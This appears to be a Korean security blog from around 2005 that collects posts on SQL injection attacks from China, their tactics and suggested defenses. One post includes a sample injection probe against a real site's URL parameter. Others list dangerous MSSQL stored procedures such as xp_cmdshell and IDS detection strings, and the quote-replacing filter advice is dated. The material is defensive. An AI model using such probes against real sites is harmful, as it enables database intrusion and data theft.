기능상으로는 최적화 되어 있죠. 작은 부분 하나를 신경 쓰지 못해서 생기는 문제입니다.
동일하게 manian 이 사이트도 똑같이 당합니다.

간단하게 말씀 드려 DB에 직접 인자를 전달하는 웹 코딩에 있어서 이 인자값에 대해 검사를 하지 않으면 DB에 직접 명령을 내릴 수 있습니다.

다들 밑에 게시물 보면 바이러스 제품에 걸리고 안 걸리고 이걸 가지고 언급을 많이 하시는데 이건 차후적인 문제입니다. 어떻게 해서 그 웹 소스에 바이러스 코드가 들어 갈 수 있는지가 가장 중요한 관점이 되어야 하지 않을까요?.

문제는 여기에서 부터 시작합니다.

예를 들어 이 글을 입력하는 URL을 보면 다음과 같습니다.
http://manian.dreamwiz.com/board/write.asp?bid=A010101&page=1&cate=6

Write.asp 라는 웹 소스내에 인자는 bid , page , cate 라는 세개의 인자를 가지고 있습니다.
물론 내부에 더 있을 수 있죠. 이 각각 인자를 가지고 DB에 해당하는 인자를 조합한 값에 일치 되는 결과를 돌려주고 그 결과가 화면상에 나타납니다. 그렇다면 bid 는 문자와 숫자가 조합이 되어 있고 page 와 cate 인자는 숫자가 입력 되도록 되어 있습니다.

만약 위의 인자에 다른 값들이 들어가면 어떻게 될까요? DB에서 인자의 구분은 ' 와 같은 인용부호를 통해 이루어 집니다. Bid=A010101 이라는 값에서 DB로 쿼리하기 전에 코딩상에서 'A010101' 이라는 값을 넣어서 select 쿼리가 들어가게 되겠죠. 이 값의 뒤에 ' 문자를 더 입력하면 어떻게 될까요?. 'A010101'' 입력이 되겠죠. 그러면 DB에서는 ' 인용부호가 닫혀지지 않았다는 에러가 발생하게 됩니다. 여기에서 부터 SQL Injection 공격이 이루어 지는 거죠. ' 문자를 입력하거나 And 문자를 입력하였을때 DB에 저장된 결과를 수십번의 반복 쿼리를 통해 결과값을 얻어 낼 수가 있습니다. 여기에 관련된 공격은 웹에서 SQL Injection 관련 문서를 찾으면 다수 나올 껍니다.

page와 cate에는 숫자만 들어 가야 하는데 이건 프로그래머의 가정이죠. 입력하는 사람이 숫자가 아닌 문자를 입력한다면 어떻게 될까요?. 스크립트 상에서 숫자만 있는지를 검색해야 하는데 안할 경우에는 DB로 바로 전달이 됩니다.
브라우저 상으로 볼때는 500 Internal Server error 가 발생되어 실행이 안되는 것으로 보이나 Raw Traffic상에는 DB에서 리턴되어 오는 결과가 저장 되어 있습니다.
Ethereal 등으로 트래픽을 보면 확인 할 수 있습니다.

위의 예에서 보듯이 지난 5월 부터 이루어진 국내사이트의 공격에서 가장 중요한 관점은 이겁니다. 인자에 대한 입력 체크 및 Validation 체크가 핵심입니다.
Type에 대한 체크 및 인자의 입력값에 대한 길이 체크 그리고 특수문자 입력에 대한 처리가 가장 중요한 부분입니다.

http://blog.naver.com/p4ssion/40015866029 게시물에 올려진 내용들도 참고 하시면 될 듯 싶네요.

paros 나 web application scanner 등을 이용하여 인자 단위의 유효성 체크와 SQL Injection 취약성 가능성을 체크 하는 것이 가장 중요합니다. 진단 툴의 경우도 만들어서 쓰고 있는 툴의 예를 들면 ScreammingCSS 라는 CSS 진단하는 펄 스크립이 있습니다. 이걸 변경하고 SQL Injection 이나 인자 단위의 입력값 검증을 하는 루틴을 첨가하면 손쉽게 만들 수 있습니다.

입장이 곤란해서 오픈을 못하는 것이 안타까울 따름입니다.

그럼 ...

------------

답변중에서:

 

로긴 창에 SQL Injection을 시도하는건 작년 까지의 버전입니다.
중국쪽에서 인자 각각에 대해 DB가 에러메시지를 보내는 것을 받아서 Blind SQL Injection 기법으로 DB user 및 계정 정보를 획득 합니다.
위에 설명을 잘 보시면 Form이나 로그인 창에 입력하는게 아닙니다.

길이제한이 없을 경우 이 글의 링크인 http://manian.dreamwiz.com/board/view.asp?bid=A060201&no=116895 에다 no가 숫자만이 아닌 문자도 받는다고 했을때 http://manian.dreamwiz.com/board/view.asp?bid=A060201&no=116895' and db_name() .. 등등 이렇게 쿼리를 하면 어떻게 결과가 나올까요?..
아마도 500 Internal Server error가 뜹니다. 그러나 위의 게시물대로 Raw Traffic을 보면 MSSQL의 경우  결과가 전송되는 것을 확인 할 수 있습니다. 즉 브라우저에 보여지는 것과 웹로그에는 500 Error라고 나타나도 DB와 조회는 가능하다는 거죠.

이 관계를 모르기 때문에 문제가 계속 되는겁니다.
분명히 인자에 대한 길이 제한 및 인자 값에 들어가 있는 특수 문자 제어등과 같은 Input validation check가 안되면 계속 됩니다. 예전과 같은 SQL Injection 로그인 기법을 생각하시면 안됩니다.

웹 프로그래머 이시면 이글의 링크를 예를 들어 bid 와 no 에 값으로 받는 것에 대해 숫자인지 아니면 특수문자가 들어가 있는지 일정 길이 이상이 넘는지를 체크하여 DB에 전송 해야 합니다. 이런 체크가 선행 되지 않으면 DB는 거져 먹는게 되죠.

그럼.

 

Posted by 바다란

댓글을 달아 주세요


의미 있는 이야기들도 다수 있습니다. 현장에서 보안 분야의 일을 직접 수행하는 컬럼리스트로 보이네요.
현실적인 문제들에 대한 이야기도 있고 현재의 위협을 간과하는 것들도 있고..

아이디어들도 몇개 보입니다.  제목과 글 내용이 매칭이 되지 않는 점만 빼고는 ...
일반적인 의견으로 보면 4번 항목을 제외하고는 긍정할 만 합니다.  딱 일반적이고 피상적으로 눈에 보이는  문제들을 짚었구요.. 일반론 적인 이야기 여서 참고 삼아 보시면 될 듯 싶습니다. 

보안업무를 하면서 보면 딱 말로만 잘하는 타입의 사람을 보게 되는데 글을 쓴 컬럼리스트의 경우도 그에 해당하지 않나 싶습니다. 다만 기술적인 부분이 아주 쪼금 언급이라도 되어서 다행입니다만...

 

해외의 경우에는 변화도나 발전도가 그리 빠르지 않아서 기술이 중요하지 않을지 몰라도..

정신없이 발전하는 우리의 경우는 전 세계로 부터 테스트 베드가 되다보니 또한 기질상 빠른 적용으로 인해 새로운 문제들이 날이 갈수록 출현하고 있어서 기술적인 진보와 커버리지가 매우 중요합니다. 상황에 따라 다른 이야기 이겠죠.. 우리의 현실과는 맞기도 하면서 다른 부분도 있는 그런 이야기 입니다.

 

그럼 좋은 하루 되십시요.

=========================================================

 

http://news.naver.com/news/read.php?mode=LSS2D&office_id=092&article_id=0000005157&section_id=105&section_id2=283&menu_id=105


 

Posted by 바다란

댓글을 달아 주세요

Terrorists Don't Do Movie Plots


 

http://www.schneier.com 사이트에 가시면 많은 Security 관련된 칼럼 들을 만날 수 있습니다.

브루스 슈나이어는 오래전 부터 익숙한 이름입니다. 암호 부분에 정평이 나있죠. 그러나 한 영역을
고집하지 않고 큰 부분을 보려고 많이 노력한 사람이기도 합니다.
예전 보안 관제 관련 회사에 여러해 동안 근무한 적이 있습니다.
이때에도 슈나이어의  관점과 동일한 컨셉을 가지고 많은 부분을 설계하기도 하였는데
이 글을 읽다보니 사고 방식이나 보는 관점 등에서 동질감을 많이 느끼게 합니다. ^^ 물론 본 적은 없죠..

카운터 페인이라는 회사는 2000년 초기에 설립된 Security Monitoring 관련된 회사 입니다.
미국내 중요 국가 기관들에 대한 IT 보안 이슈를 체크하고 모니터링 해주는 곳이며 전문적인 영역을 지니고 있는 회사입니다.
IT 보안과 물리적 보안은 영역이 매우 다르지만 보는 관점에 따라 동일하게 볼 수도 있습니다.
한 분야의 전문가 영역에서 다른 부분을 비유하여 보는데 아래의 글은 다음과 같이 해석하면
IT 보안 부분에도 동일하게 적용이 됩니다.

테러 -> 해킹 , 크래킹
표적 ( 공항 , 버스 , 지하철  ... ) -> 중요 IT 자산

 

오래전 부터 알고 있던 분야의 전문가가 상당히 관점이 다를 수도 있는 물리적 보안 의 관점에 대해
거시적인  문제를 제기 하고 있는데 이 부분은 IT 부분에도 동일하게 적용이 될 수 있습니다.
테러에 대한 대비책에 있어서 단편적인 대책과 일방향적인 업무처리 , 책임회피를 위한 생색내기 활동등 여러가지 부분들이 상존하는 위협을 없애지 못하는 원인이며 향후에도 지속될 문제라고 지적하는데 일면 타당하다고 보여집니다.
매번 미국의 영화에 단골로 등장하는 스탤론이나 브루스 윌리스는 현실에서는 존재하지 않습니다. 이것이 진정한 현실입니다.


상상과 현실을 혼돈 하지 않는 것에서 모든 것이 출발해야 하죠. 문제의 인식과 원인에 대한 것들 까지도...
미국의 테러에 대한 근본적인 해결은 물론 힘으로 해결하고 자신의 의견을 무력으로라도 관철하려는 의지가 사라지지 않는한 또 주위국가와 함께 가려고 하지 않는 한 해결 되지 않겠지만 IT 보안 부분에 대해서는 많이 다른 관점이 되겠죠.

우리도 이제는 지켜야 할 자산이 매우 많아 졌고 또한 지금까지 여타 회사나 기업체들이 그러하였듯
Security 관련 결정이 단편적이고 매우 낮은 수준에서 이루어 진 것이 현실 입니다.
침입 탐지 시스템을 설치하고 방화벽을 설치하면 보안이 다 되고 웹 관련 방화벽과 스캐너를 구비하면 모든 것이 다 이루어지는 것인양 생각하는 기업들이 많았습니다만 현실은 그렇지 않습니다.

현실과 이상의 괴리는 생각하는 대로 발생하지 않는다는 점에 있습니다. 눈에 보이는 부분이라도
어떻게 강화를 해야 책임추궁을 피하고 면피할 일들이 생기는 것이긴 하나 근본적인 문제의 해결과는 매우 다른 이야기가 됩니다.

여기에서 현업 담당자의 딜레마가 시작이 되는 것이죠. 어떤 방향을 추구하느냐에 따라
허우대만 번쩍하는 것이냐 내공이 있는 그 무엇이 되느냐가 됩니다. ( 개인적으로는 내공을 추구합니다. 물론 어려움이 많지만...)

어떤 방향이 옳을까요?. 단기적인 성과 혹은 장기적인 안정 . 또 그만큼의 시간을 줄만큼 여유와 인내가 있을런지..

연휴동안 보안 관련된 기사나 글들을 읽다보니 느끼는 점이 많은 글이여서 올려 봅니다.


이하 기사는 URL을 참조 하십시요.

 

http://www.schneier.com/essay-087.html  ( English )

http://wired.daum.net/business/article00350.shtm (Korean)

 

Posted by 바다란

댓글을 달아 주세요

http://www.zdnet.co.kr/news/enterprise/etc/0,39031164,39149196,00.htm

 

 

Penetration Test 관점에서 가상의 네트웍을 설계하고 각자의 팀에 침입하도록 하는 Capture the Flag를 NSA에서도 하나보다.

 

Homeland Security와 NSA의 구성상 보안적인 측면이 강한데.. NSA의 경우에는 신호, 전자, 통신 정보를 아우르고 Homeland Security는 내부의 보호 및 물리적인 보호를 총괄하는 거대한 집단이다.

 

이 두 핵심에서는 매년 마다 정기적으로 내부 기간망에 대한 테스트를 진행하고 주요 인력들에 대한 교육을 진행 하는데.. 주기적으로 발표된 Homeland Security 부서의 기간망 점검과 그 결과 발표는 미국내의 여러 정부기관에 많은 영향을 끼치고 있다.

 

한번 읽어볼 만한 기사이다.

 

읽어본 기사 중 가장 기억에 남는 부분은... 1~2년을 보호하는 네트워크에 침입하기 위해 노리는 자들이 존재한다는 구절..

 

아무리 보안을 강조 한다 하여도 최소한의 불평으로 최대의 효과를 보장하는 시스템은 어려운것 같다.

 

어느 정도의 과감성과 결단성..그리고 지식과 경험으로 무장된 강인함만이 내.외부 [ 공격자외에 낙하산들을 포함한 내부의 인력]로 부터 지킬 수 있다.

지키고자 하는 대상이 보호하고자 하는 네트워크 이든 기밀정보 이든 또한 자기 자신이든 간에..

 

다음엔 보안관리자 라는 측면에서 잡생각들을 한번 정리해 보도록 하자...~~

Posted by 바다란

댓글을 달아 주세요

2005년 5월 경부터 중국으로 부터의 침입이 급증하고 있다. -본 글은 2005년 5월에 작성한 내용입니다.

 

해당 하는 침입의 유형을 살펴보면 인자 단위의 SQL Injection이 주된 침입 방법이며 그외의 공격 유형은 이전 부터 알려진 잡다한 방법들을 거의 다 동원하고 있다.

 

 

특징을 살펴보면..

 

*인자 단위의 SQL Injection Attack

각 웹 URL의 인자 각각에 대해 DB 쿼리 시도시에 인자에 대해 특수 문자 및 길이에 대한 제한을 제대로 코딩하지 않음으로 인해 DB에 명령이 전달이 되는 문제가 있다.

 

또한 사용자의 브라우저에는 HTTP 500 에러가 발생하지만 Raw Traffic 상에서는 dB의 결과값이 전달이 되어 온다. 즉 DB에서 실행된 결과값이 웹 서버로 리턴이 되지만. HTML 상으로는 웹서버에서 이해할 수 없어서 문제가 발생한다는 500 에러 메시지가 디스플레이 된다.

 

사용자가 보는 것은 Internal server error 와 같은 문장을 보지만 실제 Raw Traffic 상에서는 결과값이 리턴이 되는 것이다.

 

* 자동화된 툴을 이용한 직접공격

기본적으로 SQL Injection 공격을 수행하며 수행된 기법은 일반적으로 알려진 Blind SQL Injection을 이용합니다. DB 계정 및 접속 권한의 획득에는 SQL Injection이 이용이 되며 이후 시스템에 명령을 내리거나 파일의 업로드등을 하기 위해서 DB 서버의 Stored Procedure를 사용한다.

자동화된 툴에서는 수작업으로 진행 해야 했던 위의 모든 과정을 일괄적으로 처리하는 툴이며 툴의 운용시에는 웹서버에 다량의 웹로그가 발생이 된다.  SQL Injection 공격을 수행하는 툴은 상당히 여러종류이며 매우 다양한 형태의  툴이 개발되어져서 중국내의 공격조직에 판매가 되고 있고 악의적으로 사용하는 그룹에 판매가 되고 있어서 널리 사용되고 있다.

 

* 지능적인 시스템 침입

DB서버에 접속이 가능한 상태이라 시스템에 제한적인 작업 및 Db 서버에 악의적인 행동을 할 수 있음에도 불구하고 웹페이지에 사용자 단위의 감염을 유도하는 악성코드만을 삽입한다. 즉 침입의 목적은 해당 서버의 권한 획득이 아니라 일반 인터넷 유저의 정보 획득이 목적이다. 그러므로 대부분의 관리자들이 알아채기가 상당히 어려운 상태이다. 모든 서버의 웹 로그를 볼 수가 없는 상태이고 공격을 모니터링 하지 못하다 보니 사용자 단위의 신고를 통해서만 파악을 할 수 있는 상태이다. 수동적인 대처외에는 수행을 하지 못한다.

 

일단 공격 성공후에는 악성코드를 심는 것 이외에 웹 상에 여러개의 백도어들을 생성한다. 웹 백도어외에 시스템 백도어도 신형으로 다수를 설치하며 해당 백도어를 이용해 원격에서 제어를 손쉽게 하도록 한다. 웹 쉘을 통해 시스템의 설정 파일 및 중요 소스를 임의로 다운 받거나 수정할 수 있다.  시스템 백도어를 이용해서는 리버스 텔넷과 같은 유형으로 내부 서버 및 중요 서비스 영역(사설 IP로 보호) 에 대해 추가적인 공격을 수행한다.

 

*IP 차단에 대한 우회

 

실질적으로 공격이 다수 발생하는 IP 영역은 중국쪽 IP 대역으로 부터 일어나고 있으나 중국쪽 IP 대역을 차단할 경우 국내에 존재하는 다수의 취약서버 및 해외의 취약서버를 통해 우회공격을 시도한다. 우회공격을 이용할 시에는 탐지 기법의 향상과 웹 코드 상의 소스 수준을 높이는 것 외에는 대안이 없다.

 

 

자..위와 같은 유형들의 공격이 일반적으로 발생하고 있다. 또한 공격 기법도 난이도가 높아 졌으며 더욱 위험한 것은 자동화 되어 있다는 점이며 자동화된 공격툴의 사용 목적이 오로지 개인정보 획득을 통한 금전적 이득 취득이 가장 큰 목적으로 되어 있다. 

 

위험한 시기이며 지켜야 할 것이 많은 우리로서는 매우 어렵고 긴 싸움이 될 것으로 보인다.

 

대책으로는 다음과 같다.

 

1.  DB 단위의 대책

현재는 MSSQL에 대한 공격만이 자동화 되어 있으나 Oracle 및 Mysql 에 대한 공격도 머지않아 자동화 될 것으로 예상이된다. 그리고 MSSQL에서는 사용하지 않는 Stored Procedure의 삭제를 권한다.

   xp_cmdshell
   xp_dirtree
   xp_regdeletekey
   xp_regenumvalues
   xp_regread
   xp_regwrite
   sp_makewebtask
   sp_adduser ...등등

또한 DB 쿼리를 사용하기 위해 웹에서 호출을 시행하는 DB 계정의 경우 DML 권한만을 주고 DDL 권한을 주지 않거나 Stored Procedure의 호출 권한을 제거한다. 비단 MS-SQL에만 해당하는 것이 아니라 전체 DB에서도 해당 부분이 고려 되어야 할 것이다.

 

2. 소스 단위의 대책

인자단위의 체크를 강화한다.

(' , <,>,; ,--) 문자들과 같은 특수문자들의 인자값에 포함되지 않도록 필터링 한다.

즉 DB 쿼리시에 사용되는 모든 변수들에 대해 다음과 같은 처리가 되어야 한다.

  - single quote 하나를 single quote 두 개로 replace하거나 \' replace
    data = replace(data, "'", "''")
또는
    data = replace(data, "'", "\'")

  - semi colon
double dash 제거
    data = replace(data, ";", "")
    data = replace(data, "--", "")

등등.. 각 웹 언어 별로 해당하는 처리가 선별 되어 진행이 되어야 한다.

또한 인자의 길이를 반드시 확인 하여야 한다. 특수 문자가 없이 And 문을 붙여 쿼리를 수행하는 것도 기본 공격 유형이므로 인자당 해당하는 길이를 적정정도 예상하여 이후의 문장은 버리거나 하는 것이 매우 중요하다.

 

 

3. 네트웍 차원의 침입 탐지

 

IS_SRVROLEMEMBER , IS_MEMBER('db_owner') , db_name()  ,%5Bsysobjects%5D 와 같은 문자열을 웹 Request 문자열에서  탐지 하도록 IDS에 룰셋을 설정한 이후 해당 패턴이 감지 될 시 차단을 수행하면 네트웍 차원의 대책에 도움이 될 수 있다.

 

 

이상과 같이 공격 현황 및 대책을 분리할 수 있다.

 

Posted by 바다란

댓글을 달아 주세요

기사를 보다보니 중국발 해킹 100만 해커라는 글이 있네요. 그나마 이쪽 부분을 조금 들여다본 사람으로서 조금은 책임있는 글을 써야 하지 않나 하는 생각에 짧게 간략해 보겠습니다.
 
http://news.naver.com/news/read.php?mode=LSS2D&office_id=011&article_id=0000121048&section_id=105&section_id2=283&menu_id=105
 
 
일전 2002년 쯤에 중국으로 부터의 침입 관련 문서를 만들면서 그동안 너무 국내의 현실에만 안주한 것 아니냐는
자기 반성 차원에서 중국쪽의 관련 사이트에 대해서 많은 조사를 한 적이 있습니다.
 
그때 추정 되기를 향후 상당한 위협이 될 것이고 상위그룹의 수준이 빠르게 높아져 가고 있다고
진단을 한 적이 있는데 해당 이슈가 3년이 지난 지금 더욱 폭발적으로 증가를 하고 있네요.
 
지금의 조사와 차이가 있겠지만 2002년 당시에 제가 조사를 하면서 느꼈던 점을 기술 하면 다음과 같습니다.
 
상위레벨 : 취약성을 발견하고 해당 취약성에 대한 공격 코드 작성 가능자
중위레벨:  발견된 취약성에 대한 공격코드 작성이 가능한 자
하위레벨:  취약성에 대한 이해는 부족하나 공격코드의 활용이 가능한자.
무급레벨:  공격코드의 자동화된 툴의 이용자
 
2002년 분석 결과:

기술적 상위레벨 : 전체 인원대비 1% 미만 - 대략 2개 정도의 상위 그룹이 활동 하고 있었고 해당 인원도 10여명 내외의 고수가 존재한 것으로 파악이 되었습니다.
 
중위레벨 :  상위레벨의 10배수 가량이 존재하는 것으로 파악이 되었으며 부분적인 공격코드의 변형 및 작성이 가능한 자로 판단이 됨.
                   게시판 활동내역으로 보면 2~300여명 정도가 활동한 것으로 보임
 
하위레벨: 공격코드의 활용이 가능한자는 프로그래밍에 대한 이해가 조금이라도 있고 기본적인 공격에 대한 개념이 있는자로 몇천 단위로 파악이 되었습니다.
 
무급레벨: 가장 다수의 인력을 보유하고 있으며 가장 무서운 존재이죠. 대략 사용자 수는 미상. 몇십만 이상으로 추정됨.


위의 2002년 판단하에 1~2년 정도 관찰한 결과 대외적인 이슈 발생시 마다 상위레벨을 중심으로
몇개의 그룹화가 되고 분화가 되어 상위레벨에서 대표적인 공격 코드 몇개를 작성을 합니다. 그리고 공유를 하죠. 그룹원들에게만..
그리고 중위레벨이 해당 공격코드를 가지고 자동화된 툴을 작성합니다.
하위레벨은 발표된 공격코들 변화 시키거나 다른 유형을 공격 할 수 있도록 붙이죠.
최종적으로 공개되거나 약속된 사이트에 만들어진 자동화된 툴을 올립니다.
 
가장 무서운 무급레벨에서 만들어진 자동화 툴을 이용하여 무작위로 공격을 시행하죠.
이들에게는 IDS이고 침입에 대한 경고가 먹히지 않습니다. 오로지 공격이지.. IIS 공격 툴을 이용해
Apache에 무작위로 공격 하기도 하고 상당히 많은 공격이 이루어 집니다.
공격이 성공된 후에는 세트로 구성된 권한 획득 툴 및 타 서버의 취약성 스캔 , 공격툴들을 세트 단위로 업로드 합니다. 해당 거점을 이용해 지속적으로 영역을 확장해 나가죠.
 
상위에서 부터 무급레벨까지의 연결 통로에 제한이 없으며 무제한적으로 상호간에 공유가 되고 정보의 교류가 이루어 지고 있습니다.
연결 통로가 되는 사이트만 제한을 해도 피해는 대폭 줄어 들 것이지만 해당 사이트에 대한 제한은 중국 당국만이 열쇠를 쥐고 있을뿐입니다. 우리는 제 3자일뿐인거죠.
 
2002년 이후 2년간의 관찰결과 상위레벨은 3~4배수 정도 증가 하였고 ( 지난해에 중국에서 있었던 Xcon 세미나 및 해당 세미나에 대한 토론 및 기타 논의들을 가지고 추정 ) 중위레벨 및 하위레벨은 매우 폭넓게 확대 된 상태입니다.


2002년만 해도 보안 관련된 정보가 논의되는 일정 수준 이상의 사이트는 몇십개 였으나
지금은 몇 천개 이상으로 보이며 고급정보가 논의되고 배출 되는 사이트도 몇 백개 가량으로 확대된 것으로 파악이 되고 있습니다.  그만큼 저변이 폭넓게 확대 되었다는 반증이죠.
 
현재 시점에서 일정정도 미루어 보면 위에서 언급한 프로세스가 그대로의 유형을 지니고 있고 다만 공격코드 및 자동화된 툴을 만드는 중위레벨에서 해당 툴을 유상으로 판매하는 움직임이 2005년 부터 활발하게 출현을 하였습니다.
상위레벨은 각자 회사를 차리거나 중국내의 IT 인프라 확장에 따른 보안 관리자 및 보안 전문가로 활동을 하고 있죠. 이중 일부가 온라인 게임의 Abusing 및 직접 공격을 통해 부를 축적 하는 것으로 판단이 되고 있습니다.
 
여러 기사에서 보듯이 중국에서의 온라인 게임 공격은 상당히 활발한 상황이며 현재 상황에서 두 가지 정도의 그룹으로 나눌 수 있을 것 같습니다.
크래킹 및 직접 공격을 통한 온라인 게임 공격 , 악성코드 유포를 통한 사용자 정보를 획득한 상태에서의 게임 공격과 같이 부류를 나눌 수 있고 현재 상태에서 범위나 공격 가담 인력은 유추하기 어려운 상태입니다.
 
중국내에서 일어나는 사이버 범죄에 대해서는 중국 공안이 강력하게 대응을 하고 있지만 국외에 대한 공격에는 그다지 강력한 대응을 하지 않고 있습니다.
이런 현상은 몇년전 부터 지속되어오던 현상이지만 현재 상태에서는 공격 거점이나 공격 인원이 추정 불가능할 정도로 늘어난 상태라 단속에도 어려움이 지속 될 수 밖에 없습니다. 이 이야기는 공격에 대한 대응을 하는 것도 한계가 있고 IT 인프라가 확대 될 수록 계속 될 수밖에 없는 문제일 것입니다.
 
앞으로도 IT 산업의 크래킹으로 인한 위협은 계속 될 것이고 증가될 것으로 판단됩니다.
여력있는 기업 및 여력이 있는산업 차원에서만 효율적인 대응으로 일정정도의 효과를 보게 될 것이고  효과의 유지를 위해서도 지속적인 노력 및 비용 투자가 계속 될 수 밖에 없을 것입니다.
 
전체적인 대응 방안을 큰 범주에서 이야기 하면 다음과 같은 유형으로 줄일 수도 있으나
효과가 나오기 까지는 상당기간이 소요될 것으로 판단됩니다.
 
1. 각 기업 마다의 서비스 오픈 및 신규 서비스 , 개편 서비스에 대한 강력한 보안성 검수 - 기존 웹 애플리케이션 및 내부 보안 취약성의 제거를 목적으로 함.
 
2. 일괄적인 자원의 관리를 통해 커널이나 Application 버전의 일률적인 갱신 프로세스
 
3. 개발 프로세스 단위 부터의 보안성 강화 - Secure Programming  - 현재 상태에서는 향후에도 웹관련된 부분에 대한 위험성이 증가할 것이므로  웹 관련 코딩에 대한 절차 이행 여부를 중시해야 함.  실제적으로 현재 까지 출간된 웹 프로그래밍 서적의 보안 부분 강화 및 개편이 되어야 겠죠. ^^
 
4. 내부 중요 Data에 대한 보호 방안 수립 및 강력한 유출 방지 방안의 수립
    - 이미 권한이 다 노출이 된 상태에서도 보호 될 수 있는 방안이 필요합니다. 특정 툴을 사용하는 것이 전부는 아니며 정책 / 사람 / 정보 / 시스템 전반적인 부분이 총괄 되어야 하겠죠.
 
5. 수준 있는 정보보호 인력의 육성 및 분위기 조성 ( 분위기만 조성되면 금새 따라가겠죠. 원래 자질이 우수한 민족이다 보니.. ) 여기서의 정보보호는 보안인력만을 의미하지는 않습니다.
 
부수적으로 직접 효과를 볼 수 있는 방법은  침입 탐지 및 침입 방지 시스템의 Ruleset의 정밀화및 쉽게 업데이트를 할 수 있는 인력 및 능력의 확보도 중요한 관점이라 할 수 있습니다. 또한 전체적인 공격 유형의 변화를 추정하고 강력하게 권고를 하고 경고를 할 수 있는 레벨의 단체나 기관이 아쉽죠. 사고 발생 이후의 대응 보다는 발생 위험 가능성을 종합적으로 판단하여 사고가 발생하기 이전에 위험성을 경고 할 수 있어야 합니다.  - 이 부분은 사고가 발생하지 않을 경우 해당 경고에 대해서 무감각 하고 중요하게 생각하지 않을 수 있지만 매우 중요한 부분입니다. 현재도 경고를 하고 있지만 수동적인 상태이며 공격의 유형 이나 변화에 대해서 짚어 가는 전략적인 사고는 없는 상태입니다.
 
 
간략하게 위의  정도로 추려서 지속적인 보안레벨을 높일 수 있을 것입니다. 어느하나 쉬운 것이 없습니다. 그래도 진행하지 않으면 문제는 계속 될 수 밖에 없습니다.
현재는 커뮤니티 문화 및 인터넷 문화가 확산되어 금전 거래 및 문화로도 연결이 된 우리 나라에 대해서만 피해가 크게 보이지만 인터넷 문화의 확산에 따라 유비쿼터스 환경의 빠른 확대에 따라 세계 각국으로도 중국의 공격은 유효하게 발생이 될 것입니다. 
 
몇 년이내에 중국 당국의 강력한 조치가 없다면 세계적인 골칫덩이가 될 것이 분명하며 현재로서는 우리나라가 타켓이 된 것일뿐입니다. 위기는 기회라 하였습니다. 현재의 위기를 지혜를 모으고 역량을 모아 헤쳐 나간다면 향후의 IT산업 및 인터넷 산업 부분 전반에 걸친 잠재력과 인력을 확보하게 될 것이라고 판단 하고 있습니다.
 
물론 모든 것은 제 개인의 판단이고 사견입니다. 그리고 이 글도 짧은 시간에 후다닥 쓰는 글이라 다듬어 지지도 않은 내용이구요. 짧은 지식과 식견으로 쓸려니 참 안타깝습니다. 
 
아래 현재 문제에 대한 간략한 대책이나 내용이므로 참고 하시면 될 것 같습니다. 

http://blog.naver.com/p4ssion/40015866029

http://blog.naver.com/p4ssion/40017941957

http://blog.naver.com/p4ssion/40018174273

Posted by 바다란

댓글을 달아 주세요

수요일에 발표한 내용인데 의미 전달이 잘 되었나 모르겠습니다.

그럼.

 

홈페이지 보안기술 세미나…패치관리등 수시체크 필요

지난 5월 이후 계속되고 있는 국내 유명 사이트에 대한 중국발 해킹(출발지 IP가 중국지역인 해킹) 및 악성코드 유포 시도가 향후 더욱 대규모로 확산될 우려가 커 보다 근본적인 대책 마련이 필요하다는 지적이 제기됐다.

NHN IT보안그룹 전상훈 과장은 19일 서울 대치동 섬유센터빌딩에서 한국정보보호진흥원 주최로 열린 `홈페이지 보안 기술 세미나(중국 발 해킹대비 홈페이지 보안 워크숍)'에서 "중국으로부터의 침입 가능성이 점차 증대되고 있으며, 특히 웹 애플리케이션에 대한 유효성 체크가 돼 있지 않아 향후 지속적이고 대규모적인 해킹 가능성이 존재한다"고 지적했다.

전상훈 과장은 "최근의 해킹은 국내ㆍ외 사이트의 모든 시스템 권한을 지니고 있음에도 불구하고 사용자 개인정보를 탈취하기 위한 악성코드 유포만을 목적으로 하고 있는 것이 특징"이라며 "NHN의 경우 키보드 후킹을 통한 정보유출 방지를 위해 키보드 보안모듈을 설치하고, 개인정보를 유출하기 위한 악성코드를 제거하는 전용백신을 운영하는 한편, 사용자들의 악성코드 감염을 원천 제거하기 위해 MS 패치의 자동설치를 게임 시마다 확인하고 설치하도록 하는 패치관리시스템을 운영할 예정"이라고 말했다.

전 과장은 또 "모든 운영자들이 개발ㆍ운용ㆍ데이터베이스ㆍ보안부분에 대해 총체적으로 대응하고 웹 애플리케이션에 대해서도 진단과 수정이 필요하다"며 "특히 기업 내의 IT자산이 중요한 역할을 수행하는 IT기업의 경우 보다 더 강력한 유효성 체크가 있어야 한다"고 설명했다.

또 엔씨소프트 김휘강 팀장은 최근 중국발 공격증가와 관련해 "공격자 패턴 분석결과, 서버ㆍ네트워크 장비에 대한 직접적인 공격보다는 취약한 사용자들의 PC를 공격하는 경우가 많다"며 "해킹을 차단하고 방어시스템을 잘 구축하는 것이 중요하며, 해킹의 목표를 원천 제거하는 차원에서 전략적으로 게임 아이템과 사이버머니 등의 현금거래를 규제하는 대책도 필요하다"고 말했다.

강동식기자@디지털타임스

Posted by 바다란

댓글을 달아 주세요

어찌 어찌 하다보니 발표를 하게 되었네요.

이제 부터 자료 준비를...

관심 있으신 분 참석 함 해보시는 것도.. ^^;

-------------------------------------------------------------

 

안녕하십니까, 한국정보보호진흥원 인터넷침해사고대응지원센터입니다.

올해 상반기의 "홈페이지 보안 기술 세미나"에 이어 웹 취약점을 이용한 해킹사고와
최근 문제가 되고 있는 중국발 해킹 공격에 대한 보안대책을 주제로 한 세미나를 개최할 예정입니다.

홈페이지 및 시스템 관리자, 웹 관련 개발자 여러분들의 많은 관심과 참여를 부탁드립니다.

감사합니다.

o 세미나 명 : 제2차 홈페이지 보안 기술 세미나(중국 발 해킹대비 홈페이지 보안 워크샵)
o 목 적 : 최근 급증하고 있는 중국발 해킹에 대한 사고사례와 보안대책 발표를 통해 국내 홈페이지 보안 향상 도모
o 일 시 : 2005년 10월 19일(수), 09:00~18:00
o 장 소 : 서울 섬유센터빌딩 3층 이벤트홀(지하철 삼성역 4번출구, 현대백화점 맞은편에 위치)
o 참석대상자
- 웹 호스팅 업체 웹 서버 담당자/포탈 업체 담당자
- 일반 기업/대학 등의 웹 서버 관리자

o 세미나 프로그램

- 09:00~09:50 : 등록 및 세미나 자료 배포
- 09:50~10:00 : 행사안내
- 10:00~10:40 : 최신 웹 해킹 기술 및 해킹 시연 (이안시큐리티 정문수)
- 10:40~11:20 : 대규모 온라인 게임 서버의 보안 시스템 구축 사례 (엔씨소프트 김휘강 팀장)
- 11:20~12:00 : 웹 호스팅 업체의 웹해킹 대응 현황 (삼정데이타서비스 최세영)
- 12:00~13:10 : 점심식사
